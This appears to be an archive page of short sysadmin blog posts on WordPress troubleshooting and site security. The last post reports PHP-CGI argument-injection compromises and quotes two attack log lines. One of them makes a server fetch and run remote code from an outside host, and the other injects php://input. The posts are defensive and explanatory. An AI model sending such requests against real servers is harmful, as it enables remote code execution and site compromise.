Top Nav

Archive | Web

WordPress Update & Plugin Install Problems

Recently has a server that would not run WordPress updates or plugin installs no matter what I did. After extensive troubleshooting, it turned out the server had SELinux enabled which disallows outbound connections from Apache.

One useful tool in troubleshooting update problems is the Background Update Tester plugin:

http://wordpress.org/plugins/background-update-tester/

It gives some extra detail on why updates can’t run.

 

 

0

Block wp-login.php On Single Site In WordPress Multi-Site

In the recent rash of wp-login.php brute force attacks, I needed a way to block access to wp-login.php on a single domain in a WordPress multi-site with many domains. The impact on customers of blocking all domains was too great so I needed a more targeted solution. Here’s what I came up with for the .htaccess file:

0

WordPress Multi-site On Plesk

It’s easy to setup WordPress in multi-site mode on Plesk.

Let’s assume you want to map:

to your multi-site installed on “acme.com”.

From an SSH login on the server, just edit the file:

If the file does not exist then create a new empty file.

Add the following line to the top of the file:

Save the file and tell plesk to reconfigure:

Now restart Apache:

Now you’re ready to go with multi-site.

There’s an article here that addresses subdomain and webmail issues:

https://codex.wordpress.org/Configuring_Wildcard_Subdomains_for_multi_site_under_Plesk_Control_Panel

0

Local File Inclusion Attacks

We’ve seen several sites compromised in the last few weeks using a “local file inclusion” vulnerability with “php://input”. Here are some sample log entries:


91.224.160.25 - - [23/May/2013:12:23:54 +0000] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 247 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.860.0 Safari/535.2"
89.111.24.97 - - [29/May/2013:08:38:22 +0000] "GET /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://gofastdownload.com/rf/code.txt HTTP/1.1" 200 1104 "-" "Opera/9.80 (Windows NT 6.1; U; MRA 8.0 (build 5745); ru) Presto/2.10.229 Version/11.64"

This page explains the attack:

http://zerofreak.blogspot.com/2012/04/lfi-exploitation-via-phpinput-shelling.html

One of the compromised sites was Expression Engine and one was Drupal.

Here’s a bit of PHP code that I added to index.php to stop further attacks:

Obviously this is a very serious threat. We would advise all sites to test for this vulnerability.

0